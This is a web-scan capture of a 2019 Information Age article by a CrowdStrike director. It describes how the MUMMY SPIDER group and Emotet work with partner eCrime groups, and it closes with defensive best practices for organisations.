www.information-age.com
Open in
urlscan Pro
18.133.176.247
Public Scan
URL:
https://www.information-age.com/ecrime-cyber-network-13708/
Submission: On January 12 via manual from US — Scanned from GB
Submission: On January 12 via manual from US — Scanned from GB
Form analysis
2 forms found in the DOMGET https://www.information-age.com/
<form role="search" method="get" class="search-form" action="https://www.information-age.com/">
<label for="search-form-2">
<span class="screen-reader-text">Search for:</span>
</label>
<input type="search" id="search-form-2" class="search-field" placeholder="Search" value="" name="s">
<button type="submit" class="search-submit">
<svg class="svg-icon" width="28" height="28" aria-hidden="true" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path
d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z">
</path>
<path d="M0 0h24v24H0z" fill="none"></path>
</svg>
<!-- <span class="screen-reader-text">Search</span> -->
<span class="search-text" style="display: none;">Search</span>
</button>
</form>
GET https://www.information-age.com/
<form role="search" method="get" class="search-form" action="https://www.information-age.com/">
<label for="search-form-2">
<span class="screen-reader-text">Search for:</span>
</label>
<input type="search" id="search-form-2" class="search-field" placeholder="Search" value="" name="s">
<button type="submit" class="search-submit">
<svg class="svg-icon" width="28" height="28" aria-hidden="true" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path
d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z">
</path>
<path d="M0 0h24v24H0z" fill="none"></path>
</svg>
<!-- <span class="screen-reader-text">Search</span> -->
<span class="search-text" style="display: none;">Search</span>
</button>
</form>
Text Content
WE VALUE YOUR PRIVACY We and our partners store and/or access information on a device, such as cookies and process personal data, such as unique identifiers and standard information sent by a device for personalised ads and content, ad and content measurement, and audience insights, as well as to develop and improve products. With your permission we and our partners may use precise geolocation data and identification through device scanning. You may click to consent to our and our partners’ processing as described above. Alternatively you may access more detailed information and change your preferences before consenting or to refuse consenting. Please note that some processing of your personal data may not require your consent, but you have a right to object to such processing. Your preferences will apply to this website only. You can change your preferences at any time by returning to this site or visit our privacy policy. MORE OPTIONSAGREE Skip to content Information Age Insight and Analysis for the CTO * Subscribe * Login * facebook * twitter * linkedin * RSS Search for: Search * News * People Moves * Major Contracts * Releases & Updates * The City & Wall Street * Events * Data & Insight * Webinars * Research * Whitepapers * Insight Guides * Buyers Guides * How it Works * What it Means * Business Skills * Sectors * Agriculture * Automotive * Aviation * Construction & Civil Engineering * Consumer Electronics & Mobile * Media & Marketing * Defence * Education * Energy * Financial Services * Government & Public Sector * Healthcare * Legal & Accountancy * Life Sciences * Manufacturing * Not for profit * Property * Retail * Technology * Telecoms * Transport & Logistics * Travel & Leisure * Utilities * Topics * AI & Machine Learning * Automation * Blockchain * Business Continuity * Business & Strategy * CIO and CTO * Cloud & Edge Computing * Communications & Networking * Cybersecurity * Cyber Innovation * Data Storage & Data Lakes * Data Analytics & Data Science * Data Protection & Privacy * Development & Programming * DevOps * Digital Transformation * Disruptive Innovation * Transformation in Action * Emerging Technology & Innovation * Governance, Risk and Compliance * Hardware & Peripherals * Immersive Technology * IoT and M2M * IT management * Legislation & Regulation * Outsourcing * Robotics * Smart Cities * Software and Applications * Start-up scene * Tech and Society * Tech Giants * Tech M&A * IPOs * M&A * PE & VC * Careers * Business Skills * Companies * Major Contracts * Releases & Updates * Recruitment * Jobs * Regions * Americas * Asia-Pacific * EMEA Search for: Search * News * People Moves * Major Contracts * Releases & Updates * The City & Wall Street * Events * Data & Insight * Webinars * Research * Whitepapers * Insight Guides * Buyers Guides * How it Works * What it Means * Business Skills * Sectors * Agriculture * Automotive * Aviation * Construction & Civil Engineering * Consumer Electronics & Mobile * Media & Marketing * Defence * Education * Energy * Financial Services * Government & Public Sector * Healthcare * Legal & Accountancy * Life Sciences * Manufacturing * Not for profit * Property * Retail * Technology * Telecoms * Transport & Logistics * Travel & Leisure * Utilities * Topics * AI & Machine Learning * Automation * Blockchain * Business Continuity * Business & Strategy * CIO and CTO * Cloud & Edge Computing * Communications & Networking * Cybersecurity * Cyber Innovation * Data Storage & Data Lakes * Data Analytics & Data Science * Data Protection & Privacy * Development & Programming * DevOps * Digital Transformation * Disruptive Innovation * Transformation in Action * Emerging Technology & Innovation * Governance, Risk and Compliance * Hardware & Peripherals * Immersive Technology * IoT and M2M * IT management * Legislation & Regulation * Outsourcing * Robotics * Smart Cities * Software and Applications * Start-up scene * Tech and Society * Tech Giants * Tech M&A * IPOs * M&A * PE & VC * Careers * Business Skills * Companies * Major Contracts * Releases & Updates * Recruitment * Jobs * Regions * Americas * Asia-Pacific * EMEA * Subscribe * Login Home » BYOD » Caught in the spider’s web: demystifying the eCrime cyber network CAUGHT IN THE SPIDER’S WEB: DEMYSTIFYING THE ECRIME CYBER NETWORK by Editor's Choice9 May 2019 * * * * * One thing was clear in 2018: law enforcement efforts have not yet halted or deterred eCrime actors and their cybercrime campaigns. Throughout the year CrowdStrike observed the rise of ‘Big Game Hunting’ tactics being leveraged in pursuit of financial payoff, along with a range of criminal adversaries engaging in notably more aggressive intrusions. eCrime was prominent in 2018. Common adversaries operating within criminal networks were tracked conducting a range of operations such as crimeware distribution, banking Trojans, ransomware, point of sale compromises, and targeted spear-phishing campaigns. However, one of the most concerning eCrimes trends was the solidification of a prominent eCrime ‘ecosystem’. Much like a nation-state, eCrime adversaries rarely work alone, and in 2018 the malware distribution threat MUMMY SPIDER solidified new and existing relationships, cementing the reality of a serious eCrime ecosystem of adversaries. MUMMY SPIDER now sits in the centre of a web of advanced eCrime adversaries which cover a range of attack tactic expertise, from ransomware, to point of sale, to banking trojans. Collaboration between these groups has only made the collective stronger, and in order to defeat them we need to understand the entire network. In order to untangle this web of e-criminals, we need to find the driver of the network and understand their motivations and approaches to cyber-attacks, which in turn will allow us to understand what connects these actors together – and eventually cut the head off the snake. > RAISING THE STAKES IN THE GLOBAL CYBER ARMS RACE > > Our global adversaries will be forced to adapt and deploy stealthier tactics > in order to continue profiting from cyber attacks, says new report > CrowdStrike. Read here THE HEAD OF THE SERPENT: MUMMY SPIDER MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. It first appeared in mid-2014, it swiftly became a formidable adversary by developing increasingly aggressive forms of malware. It does not follow typical criminal behaviour patterns, as it usually conducts attacks for a few months before going underground for a period of three to 12 months before returning with a new malware variant. In 2017, the adversary made a conscious shift away from using banking trojans to a crimeware downloader service. Furthermore, in 2018 it made efforts to render its malware more resilient, and thus more attractive to potential ‘customers’. MUMMY SPIDER conducts regular waves of spam campaigns to spread Emotet: these campaigns often use general invoicing and payroll themes. Following infection, Emotet uses geo-targeting to determine which payload to deliver to the victim machine. Over the summer of 2018, in addition to supporting the download of TinyLoader, TrickBot and ZeuS Panda, CrowdStrike Intelligence observed Emotet infections propagating MUMMY SPIDER’s own SMB Spreader to machines in the US, Canada, Germany, UK, Japan and Australia. In 2018, MUMMY SPIDER solidified its eCrime stronghold, arming itself with a web of pre-existing and new relationships with other adversaries. It continued supporting WIZARD SPIDER (Russian based threat group) through the latter half of the year, while adding geo-targeting distribution for BokBot (LUNAR SPIDER – Eastern European-based operator and developer of banking malware) and Gozi ISFB. INDRIK SPIDER (a sophisticated eCrime group that has been operating Dridex since June 2014) was also seen to continue its historic relationship with MUMMY SPIDER during 2018, although downloads of Dridex by Emotet remain rare. Other members of this established network include Individual Operators such as Panda Zeus, Nymaim and Gootkit. > CYBER SECURITY BEST PRACTICE: DEFINITION, DIVERSITY, TRAINING, RESPONSIBILITY > AND TECHNOLOGY > > As part of Information Age’s Cyber Security Month, we look at cyber security > best practice – everything from defining it to the importance of training. > Read here INTO THE TANGLED WEB: WHY MULTIPLE SPIDERS ARE WORSE THAN ONE In order to illustrate why a network of e-criminals presents a greater challenge for those within the cyber-security industry, we can use a recent example of MUMMY SPIDER activity to demonstrate. In November 2018, a significant phishing campaign was identified which was having widespread effects. Based on the sheer volume of victims, it turned out to be one of the largest Emotet campaigns that have ever been observed by a cyber-security firm. CrowdStrike was able to attribute this activity with high confidence to MUMMY SPIDER. . CrowdStrike uses the naming convention ‘SPIDER’ to identify eCriminal groups around the globe. The phishing campaign by MUMMY SPIDER consisted of a malicious macro-enabled Microsoft Word document sent as an email attachment. When recipients opened the weaponised document and macros are enabled on the machine which is quite typical, an obfuscated PowerShell command was launched. This command allowed an Emotet dropper to be installed through a remote C2 infrastructure, which in turn downloaded the Emotet malware as the first-stage implant. Once infected, more malware was able to infiltrate the system based on its geographic location. Where the ecosystem came into play was the second-stage malware download. One of the downloads, TrickBot, is attributed to the eCrime actor group WIZARD SPIDER. The other second-stage download, BokBot, is attributed to the eCrime actor LUNAR SPIDER. What intelligence can tell is, is that these groups cooperate with MUMMY SPIDER to gain access to Emotet’s victims. MUMMY SPIDER breaks down the door into a weak system, and in turn, allows a flurry of smaller groups to scurry in to take advantage of a vulnerability and execute further criminal activities whilst the system is vulnerable. Furthermore, the spiders web does not stop with MUMMY SPIDER’s immediate associates, we must also consider the further connections which these groups have. For instance, INDRIK SPIDER has known connections to TINY SPIDER and SKELETON SPIDER, both which benefit from distributed malware from INDRIK. > THE TRUE COST OF CYBERCRIME? $5.2 TRILLION APPARENTLY > > Cybercrime could cost companies $5.2 trillion over next five years, according > to new research from Accenture. Read here DON’T GET ENSNARED: AVOID FALLING INTO THE ECRIME WEB Whilst the web of e-criminals may seem daunting, there are a range of best practices which businesses can consider in order to protect themselves against these double fronted attacks. If the first adversary cannot break through your barriers, its network will remain out of the loop as well; • Develop a post-recovery strategy: Recovery is not the last step in remediating a ransomware attack — as this event clearly illustrates. Organisations need to know how the adversary got in before they can be sure they were successfully ejected. • Build an incident plan: Review and test that plan to make sure it’s up to date and its relevant for the threats that face your organisation. Running table top simulations improves reaction times and having Incident response retainers ensures you have relevant support. • Upgrade operating systems: CrowdStrike constantly sees organisations compromised because they haven’t upgraded to supported operating systems or applied relevant critical patches. The savings gained by stretching the life of an outdated system are not worth the risks. Bolstering your defences around these devices can provide some additional protection while working on the upgrade plan. • Upgrade to PowerShell V5 and remove previous versions: Logging in this version of PowerShell is so robust that security teams can see commands being executed in real time. If companies would update to V5 across the enterprise, their own security teams could see what is happening and respond right away. Also, removing previous versions of PowerShell in the enterprise will aid in preventing downgrade attacks. This is the same for other applications on your network. Security hygiene is a key to success in improving how your network operates. • Leverage multi-factor authentication (MFA) for all users and privilege access management tools: Make it as difficult as possible for adversaries to get access to and leverage both user and admin credentials from outside your network. Once they have those, they can do whatever they want in the environment. In addition to MFA, a more robust privilege access management process will limit the damage adversaries can do if they get in. There are many things that can be done to reduce the risk of intrusion and employee programs can also assist with this. If you don’t have all the resources you need consider working with a 3rd party who offer services such as Table Top exercises, compromise assessments and Incident response retainers to demonstrate your maturity and hopefully reduce or prevent incidents in your environment. Written by John Titmus, director EMEA at CrowdStrike Nominations are OPEN for the Tech Leaders Awards, organised by Information Age and taking place on 12th September 2019 at the Royal Lancaster, London. Categories include CIO of the Year, CTO of the Year, Digital Leader of the Year and Security Leader of the Year. Recognise and reward excellence in the tech industry by submitting a nomination today Tagged: Cybercrime, eCrime, Multi-factor Authentication EDITOR'S CHOICE Editor's Choice consists of the best articles written by third parties and selected by our editors. You can contact us at timothy.adler at stubbenedge.com More by Editor's Choice RELATED TOPICS Cybercrime eCrime Multi-factor Authentication RELATED STORIES Cybersecurity CYBERSECURITY PREDICTIONS FOR 2023 Cybersecurity OVER 200 MILLION EMAIL ADDRESSES STOLEN IN TWITTER CYBER ATTACK Cybersecurity WHY DIVERSITY MATTERS WHEN RECRUITING CYBERSECURITY STAFF Cybersecurity FRAUD RINGS SCALING ATTACKS AROUND THE CLOCK — ONFIDO RESEARCH Helping you grow your business is our number one priority, if you would like to take your business to the next step just sign up! sign up now Adobe - San Jose Production Service Engineer 5 Spotify - London Senior Machine Learning Engineer, Speak Discover Financial Services - Remote Senior Manager, Software Engineering Apple - Cork SPS Technical Support Advisor - French Multiverse - London Data & Research Apprentice RELATED STORIES Cybersecurity CYBERSECURITY PREDICTIONS FOR 2023 Cybersecurity OVER 200 MILLION EMAIL ADDRESSES STOLEN IN TWITTER CYBER ATTACK Cybersecurity WHY DIVERSITY MATTERS WHEN RECRUITING CYBERSECURITY STAFF Cybersecurity WHY STAFF LOSING LAPTOPS COSTS MORE THAN RANSOMWARE ATTACKS We provide general intelligence for technologists in the information age. We support CTOs, CIOs and other technology leaders in managing business critical issues both for today and in the future. FURTHER INFORMATION * Privacy Policy * Terms & Conditions * Contact Us * About * Media Packs * Contributor Guidelines CONTACT US * +44(0) 207 846 1378 ADDRESS * Stubben Edge * 77 Cornhill * London * EC3V 3QQ